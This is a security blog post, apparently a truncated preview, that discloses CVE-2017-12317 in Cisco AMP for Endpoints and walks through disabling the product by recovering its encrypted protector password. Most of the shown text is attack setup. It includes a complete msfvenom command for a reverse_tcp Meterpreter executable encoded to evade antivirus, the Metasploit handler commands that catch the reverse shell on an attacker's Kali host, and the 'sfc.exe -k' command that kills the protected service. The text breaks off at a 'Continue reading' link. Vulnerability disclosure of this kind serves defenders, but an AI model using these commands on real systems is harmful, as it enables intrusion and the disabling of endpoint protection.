AMPutations : Disabling Cisco AMP for Endpoints before detection

Edited 1/22/18: The original posting of this was removed temporarily pending Cisco patch of the issue. The newest connector version addresses the ability to obtain the decryption key via anti-debugging, however the key still has not been changed and this method still works for disabling the connector. The CVE assigned to my findings is: CVE-2017-12317

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171020-ampfe

Original post October 2017:

Cisco AMP for Endpoints has a Connector Password Protection feature. This protects the application from being uninstalled and the service from being disabled.

However, with the password protection feature enabled, it is possible to kill the NOT_STOPPABLE, NOT_PAUSABLE service using the sfc.exe command line:

sfc.exe -k {protector password}

Reverse engineering the uninstaller allows us to derive the AES decryption key that is used to encrypt the protector password. The password itself is stored encrypted and finally encoded to BASE64 in the policy.xml file.

FOR THIS TESTING WE ARE USINGĀ  A WINDOWS 10 64 BIT VM – (WinDev1709Eval w/ Windows Defender Disabled)

Unstoppable Service

If you attempt to stop the service, even via an elevated prompt, you will fail.

The only way to stop it while AMP is running is via uninstall or passing the SFC.EXE -k command-line with a valid password – this too must be done using an elevated prompt.

 

Meterpreter Setup

First lets build out an executable we can run on the target machine that will spawn a reverse_tcp meterpreter session back to a Kali box. We want to evade simple detection by AMP, so lets build it using MSFVENOM

msfvenom -p windows/x64/meterpreter/reverse_tcp -b '\x00' lhost={KALI IP} lport=8443 -i 10 -f exe -o {OUTPUT EXE FILENAME}

The ‘-p’ selects our payload and ‘-b’ specifies that null bytes are bad. Make sure you select the correct architecture for the payload as well (‘x64’ or ‘x86’) for your target operating system.

As with setting up any payload we also include our Kali/MSF host via LHOST and LPORT.

We set ‘-i’ to 10. This means the payload will be encoded through 10 iterations. At this time 10 iterations of this standard payload is detected, but increasing the iterations will solve this problem.

The ‘-f’ specifies the file format we want, so targeting a Windows 10 system, we will choose EXE for simplicity and set our output file with ‘-o’.

 

Metasploit Setup

Load up metasploit:

msfconsole

Once loaded, lets setup to listen for our reverse shell using exploit/multi/handler

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST {YOUR KALI IP}
set LPORT 8443
set ExitOnSession false
exploit

Now you are successfully set up to wait for the target to run the malicious EXE.

Later in our post-run we will be using a Python script that is going to access the MSF RPC. So we will run one additional command in the msfconsole:

load msgrpc Password=abc123

Continue reading “AMPutations : Disabling Cisco AMP for Endpoints before detection”